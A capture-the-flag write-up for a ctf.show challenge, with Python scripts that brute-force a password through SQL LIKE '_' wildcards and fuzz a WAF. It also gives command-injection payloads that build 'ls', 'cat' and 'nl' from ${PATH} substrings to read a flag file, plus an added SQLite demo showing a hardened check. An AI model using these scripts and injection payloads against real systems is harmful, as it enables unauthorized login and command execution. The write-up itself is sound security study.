# 莫负婵娟

Testing shows that `%` is blocked by the WAF, but `_` still gets through. Since `_` matches exactly one character in a `LIKE` pattern, it can be used to brute-force the password length:

```python
import requests

url = "http://6af3f7f0-3a74-41bf-8777-a5efd7344510.chall.ctf.show/login.php"

headers = {
    'Cookie': 'PHPSESSID=rhnepd32ekcb0r6amr89hhppmk'
}

# Try passwords made of i single-character wildcards; the first length
# that is not rejected is the real password length.
for i in range(50):
    exp = '_' * i
    payload = {'username': 'yu22x',
               'password': exp}
    response = requests.post(url, headers=headers, data=payload)
    if 'wrong username or password' not in response.text:
        print(i)
        print(response.text.encode('utf-8'))
```

Output:

```
32
b'<div align="center">I have filtered all the characters. Why can you come in? get out!</div>'
```

So the password is 32 characters long. Next, a script to brute-force the password itself, one position at a time:

```python
import requests
import string

url = "http://6af3f7f0-3a74-41bf-8777-a5efd7344510.chall.ctf.show/login.php"

password = ''
headers = {
    'Cookie': 'PHPSESSID=rhnepd32ekcb0r6amr89hhppmk'
}

# For each position, fix the known prefix, try one candidate character,
# and pad the rest with '_' so the pattern stays 32 characters long.
for i in range(32):
    for j in string.digits + string.ascii_letters:
        exp = '_' * (32 - i - 1)
        payload = {'username': 'yu22x',
                   'password': password + j + exp}
        response = requests.post(url, headers=headers, data=payload)
        if 'wrong username or password' not in response.text:
            password += j
            break

print(password)
```

The recovered password:

```
67815b0c009ee970fe4014abaa3Fa6A0
```
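To show why the `_` probe above works and how the check should be written instead, here is an added example (not from the original writeup) that models the login query in SQLite with a constructed `users` table and a placeholder password, then runs the same length probe against a `LIKE`-based check and against an exact comparison.

```python
import hmac
import sqlite3

# Constructed sample data (not the challenge's real table or password).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('yu22x', 'abcdef0123456789ABCDEF0123456789')")


def login_like(username: str, password: str) -> bool:
    """Assumed vulnerable check: the password is compared with LIKE.
    Binding parameters does not help here; LIKE still interprets '_' and
    '%' inside the bound value as wildcards, and SQLite's default LIKE is
    also case-insensitive for ASCII, so this leaks structure about the secret."""
    row = conn.execute(
        "SELECT 1 FROM users WHERE username = ? AND password LIKE ?",
        (username, password),
    ).fetchone()
    return row is not None


def login_exact(username: str, password: str) -> bool:
    """Hardened check: look the account up by username only and compare the
    stored value with a constant-time equality test. Wildcard characters in
    the submitted password are just ordinary characters."""
    row = conn.execute(
        "SELECT password FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[0].encode(), password.encode())


def probe_length(check, username: str, max_len: int = 50):
    """The writeup's first script, as a function: returns the first pattern
    length made only of '_' that the check accepts, or None if none does."""
    for n in range(1, max_len):
        if check(username, '_' * n):
            return n
    return None
```

Against `login_like` the probe finds 32 immediately; against `login_exact` it finds nothing, which is the behaviour a login form should have.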

After logging in there is an internal network test platform. The first guess is an SSRF vulnerability, but trying directory traversal shows it is blocked by the WAF. The following script fuzzes every printable character to see which ones get through (remember to update the Cookie):

```python
import string
import requests

url = "http://a9359d73-7931-4f4f-b3f6-1eb0ffa37f5d.chall.ctf.show/P1099.php"

headers = {
    'Cookie': 'UM_distinctid=174a4cad32570e-00904607c43d2f-333769-240000-174a4cad326103d; PHPSESSID=q8f5oki8d5qi9lfvm3l6jmaiq2'
}

# Send each printable character on its own; anything that does not trigger
# the 'evil' response is not filtered and is written to fuzz.txt.
with open('fuzz.txt', 'w') as file:
    for i in string.printable:
        payload = {'ip': i}
        response = requests.post(url, headers=headers, data=payload)
        if 'evil' not in response.text:
            file.write(i)
```

Characters that made it into fuzz.txt:

```
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ#$.:;?@_{}~ 
```

Only uppercase letters survive, and Linux is case-sensitive, so `ls` cannot be typed directly. Instead, the needed lowercase letters can be pulled out of the `$PATH` variable:

<figure><img src="https://1298837596-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUlxElCQcjylbSFsJycU3%2Fuploads%2FEgYkItwTlJpOXRK6FphZ%2F1.png?alt=media&#x26;token=0bae6346-414c-4b5e-953a-c011c1792630" alt=""><figcaption></figcaption></figure>

Extracting single characters with substring expansion:

<figure><img src="https://1298837596-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUlxElCQcjylbSFsJycU3%2Fuploads%2FBL9rT4FdAzbTGnP9pZaU%2F1.png?alt=media&#x26;token=0d0835da-8240-43aa-aa66-6f8fd176f6cc" alt=""><figcaption></figcaption></figure>

Listing the directory:

```
127.0.0.1;${PATH:5:1}${PATH:2:1}
```

A flag file turns up:

<figure><img src="https://1298837596-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUlxElCQcjylbSFsJycU3%2Fuploads%2FKiSuCPiFQ0s07JUaTu6U%2F1.png?alt=media&#x26;token=26059027-4a6d-4b95-beed-42de0249697a" alt=""><figcaption></figcaption></figure>

Read the file; either `$cat flag.php` or `$nl flag.txt` works:

<figure><img src="https://1298837596-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUlxElCQcjylbSFsJycU3%2Fuploads%2Ft2ArH1On66Ap3SzgKZQN%2F1.png?alt=media&#x26;token=e6ce53de-b3d4-4224-9fd2-31f204a5efe0" alt=""><figcaption></figcaption></figure>

```
127.0.0.1;${PATH:7:1}${PATH:8:1}${PATH:92:1} ????.???
127.0.0.1;${PATH:14:1}${PATH:5:1} ????.???
```

